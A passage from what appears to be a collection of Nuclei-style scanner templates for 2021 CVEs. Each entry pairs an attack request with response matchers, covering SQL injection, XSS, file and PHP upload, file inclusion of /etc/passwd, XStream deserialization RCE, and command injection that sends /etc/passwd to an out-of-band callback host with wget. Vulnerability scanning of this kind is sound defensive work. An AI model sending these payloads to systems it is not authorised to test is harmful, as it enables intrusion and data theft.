Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["curl|CertUtil"]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert(document.domain)\""],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey<1.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=4"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"req-condition":true,"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["phpinfo()"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: 